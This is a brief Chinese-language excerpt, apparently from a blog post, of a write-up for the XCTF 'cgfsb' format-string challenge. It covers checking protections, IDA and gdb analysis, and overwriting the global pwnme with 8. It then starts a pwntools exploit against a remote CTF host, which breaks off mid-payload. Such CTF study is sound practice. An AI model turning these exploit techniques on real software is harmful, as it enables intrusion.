xctf - cgfsb

查看程序保护 web 用IDA 打开 查看24行代码可知,经过修改全局变量pwnme = 8 则结束。 使用gdb 动态调试。svg 漏洞代码; pwnme 地址, exp:调试 from pwn import * sh = remote('111.198.29.45',36640) sh.recv() sh.sendline('hacker') sh.recv() payload = p32(0
相关文章
相关标签/搜索